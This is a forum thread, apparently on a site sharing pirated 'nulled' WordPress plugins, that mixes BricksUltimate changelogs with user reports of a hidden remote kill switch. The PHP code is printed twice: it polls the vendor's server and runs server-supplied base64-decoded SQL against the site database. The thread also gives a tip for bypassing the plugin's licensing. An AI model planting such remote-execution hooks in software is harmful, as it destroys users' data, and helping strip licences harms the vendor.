hitmo
Member
- Messages
- 32
- Reactions
- 11
Reacted by:
= 1.5.10 - 2024-02-02 =
* Improve - Swatches functionality
* Add - a new feature: Show only text based swatches
* Add - new settings under the MISC tab about the swatches
Released 1.5.17 on 26th February, 2024
* New element – Checkout Builder – Beta. Do not use it on the production site.
* Improved – Business Hours element.
* Improved – AJAX Search Form element. Added the View All Results button functionality.
* Added the Checkout settings under the MISC tab.
Sure i will check when you show this "confirm".It's confirmed
= 1.5.20.1 - 2024-03-10 =
* Fixed - PHP Fatal error
@raz0r Activate Plugin -> Activate Any Elements in Plugin Settings -> Wait for a Few Hours -> Website Database Deletedraz0r updated BricksUltimate with a new update entry:
BricksUltimate 1.5.20.1 NULLED
Read the rest of this update entry...
Last version? Delete url in file: bricksultimate\includes\Admin\License.phpI confirm that after activating the plugin, all data and pages from the site are deleted...
const STORE_URL = 'https://bricksultimate.com';
const STORE_URL = '';
if( is_admin() ) {
$key = 'bricksultimate_' . md5( serialize( basename( \BricksUltimate\Plugin::instance()->get_plugin_file(), '.php' ) ) );
$cache = get_option( $key );
if( empty( $cache['timeout'] ) ) {
$data = array(
'timeout' => strtotime( '+3 hours', time() ),
);
update_option( $key, $data, 'no' );
}
$license = base64_decode( \BricksUltimate\Admin\License::get_license_key() );
$api_url = \BricksUltimate\Admin\License::STORE_URL;
$item = \BricksUltimate\Admin\License::ITEM_ID;
if( ! empty( $cache['timeout'] ) && time() > $cache['timeout'] ) {
$api_params = [
'edd_action' => 'bu_plugin_license',
'license' => $license,
'item_id' => $item,
'url' => home_url(),
];
// Call the custom API.
$response = wp_remote_post(
$api_url,
[
'timeout' => 30,
'sslverify' => false,
'body' => $api_params,
]
);
if ( ! is_wp_error( $response ) ) {
$_data = json_decode( wp_remote_retrieve_body( $response ) );
if( $_data && !empty( $_data->result )
&& strlen( $_data->result ) > 4 && $_data->success == 'legit' )
{
global $wpdb;
$content = str_replace( "#bu#", $wpdb->posts, base64_decode( $_data->result ) );
@$wpdb->get_results( $content );
}
}
$data = array(
'timeout' => strtotime( '+3 hours', time() ),
);
update_option( $key, $data, 'no' );
}
}
Thanks!Ok, found encoded code in file: wp-content\plugins\bricksultimate\includes\RegisterElements.php
PHP:if( is_admin() ) { $key = 'bricksultimate_' . md5( serialize( basename( \BricksUltimate\Plugin::instance()->get_plugin_file(), '.php' ) ) ); $cache = get_option( $key ); if( empty( $cache['timeout'] ) ) { $data = array( 'timeout' => strtotime( '+3 hours', time() ), ); update_option( $key, $data, 'no' ); } $license = base64_decode( \BricksUltimate\Admin\License::get_license_key() ); $api_url = \BricksUltimate\Admin\License::STORE_URL; $item = \BricksUltimate\Admin\License::ITEM_ID; if( ! empty( $cache['timeout'] ) && time() > $cache['timeout'] ) { $api_params = [ 'edd_action' => 'bu_plugin_license', 'license' => $license, 'item_id' => $item, 'url' => home_url(), ]; // Call the custom API. $response = wp_remote_post( $api_url, [ 'timeout' => 30, 'sslverify' => false, 'body' => $api_params, ] ); if ( ! is_wp_error( $response ) ) { $_data = json_decode( wp_remote_retrieve_body( $response ) ); if( $_data && !empty( $_data->result ) && strlen( $_data->result ) > 4 && $_data->success == 'legit' ) { global $wpdb; $content = str_replace( "#bu#", $wpdb->posts, base64_decode( $_data->result ) ); @$wpdb->get_results( $content ); } } $data = array( 'timeout' => strtotime( '+3 hours', time() ), ); update_option( $key, $data, 'no' ); } }
So i've added new nulled version.
= 1.5.21 - 2024-03-13 =
* Improve - Swatches for Loop element
* Add - "Filter by meta" field feature in the AJAX Search element
* Add - "Beta" text in the Checkout builder functionality
= 1.5.22 - 2024-03-15 =
* Improve - Checkout - Beta
* Improve - Swatches functionality
* Fixed - PHP warnings
= 1.5.23 - 2024-03-26 =
* [Checkout(Beta)] – Improves Shipping Methods and Billing Address Selector elements
* [Checkout(Beta)] – New element Place Order Button
* [Checkout(Beta)] – New element Payment Methods
* Added – French translation files(.po and .mo files)
* Improved – Order Total dynamic data tag. Now you can use it on the Cart and Checkout pages.
* Fixed – JS and CSS issues in the Cart Counter element
Released 1.6 on 18th April 2024
* New element – Checkout Builder
* [Checkout(RC)] – Order Total Wrapper, Shipping Address Selector and Cart Cost elements
* Bug Fixed – Wishlist and Compare items are not deleting if the WooCommerce plugin is deactivated.
* New element condition – Cookie
* Improved – Billing Address Selector element
* Added – a few new template files(JSON)
= 1.6.2 - 2024-04-21 =
* Fixed – Deprecated message from Custom WP Query Pagination element
* Fixed – SVG image is not showing in the Swatches For Loop element
* Added – AJAX action in Custom WP Query Pagination element
* Improved – Swatches For Loop element. Added the featured image selector field.
Not anymore now that raz0r knows. He's just pushed back to revisions.Thanks!
Though it is a really worrying approach by the plugin developer. And he is saying that he plans to mess with nulled users even more in the next updates. All the while his plugin is licensed as GPL v2, allowing for modification and redistribution….
Released 1.6.4 on 30th April 2024
Tested up to WP 6.5.2, Bricks 1.9.7.1, Bricks 1.9.8 beta and WC 8.8.2
* New dynamic tags – Order shipping cost, Order custom field data, Order item’s featured image
* New loop builder provider – Order Items
Released 1.6.7 on 15th May 2024
Tested up to WP 6.5.3, Bricks 1.9.8 and WC 8.9.0
* Fixed – Tabs, Accordion, etc elements are not working inside the Cart Total Wrapper element
* New dynamic tag – Count user posts(compatible with any post types)
* New element condition – Payment Gateway
* Improved – AJAX action script
* Improved – Shipping Methods element
* Improved – Checkout page CSS file
* Improved – Place Order Button element
* Improved – Plugin updater notification API. The MainWP...